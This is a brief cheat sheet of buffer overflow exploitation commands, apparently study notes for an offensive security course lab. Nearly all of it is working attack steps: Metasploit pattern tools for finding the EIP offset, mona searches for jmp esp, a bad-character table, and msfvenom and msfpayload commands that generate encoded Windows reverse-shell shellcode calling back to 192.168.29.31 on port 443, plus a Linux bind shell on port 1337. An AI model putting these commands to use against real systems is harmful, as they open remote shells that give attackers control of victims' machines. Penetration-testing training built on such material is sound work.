Buffer Overflow Commands

Create unique Offset for determinging EIP and ESP (3000 is the length of the unique pattern):

  •  /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 > uniq.txt

Determine Offset (34744233 is the unique pattern found in EIP during crash):

  • /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 34744233

Inspect program for DEP and ASLR in Immunity Debugger:

  • !mona modules

Find Op code using shellme (Github Source):

  • python shellme.py -i ‘jmp esp’
  • Returns: “\xff\xe4”

Search for jmp esp in dll that was found by mona:

  • !mona find -s “\xff\xe4” -m offsec_pwk_dll.dll

Determine Bad Chars:
Hex       Dec        Description
—            —           ————————————————————————
0x00       0            Null byte, terminates a C string
0x0A     10           Line feed, may terminate a command line
0x0D     13           Carriage return, may terminate a command line
0x20      32           Space, may terminate a command line argument

msfvenom WINDOWS generate payload (preferred over msfpayload):

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 -f c -a x86 –platform windows -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai

msfpayload WINDOWS reverse tcp shell:

  • msfpayload windows/shell_reverse_tcp LHOST 192.168.29.31 LPORT 443 R | msfencode -b ‘\x00\x0a\x0d’ -t c

If its a threaded application, allow WINDOWS persistence with (EXITFUNC=thread):

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 EXITFUNC=thread -f c -a x86 –platform windows -b “\x00\x0a\x0d” -e x86/shikata_ga_nai

msfvenom LINUX generate bind shell payload:

  • msfvenom -p linux/x86/shell_bind_tcp LPORT=1337 -f c -b “\x00\x0a\x0d\x20” –platform linux -a x86 -e x86/shikata_ga_nai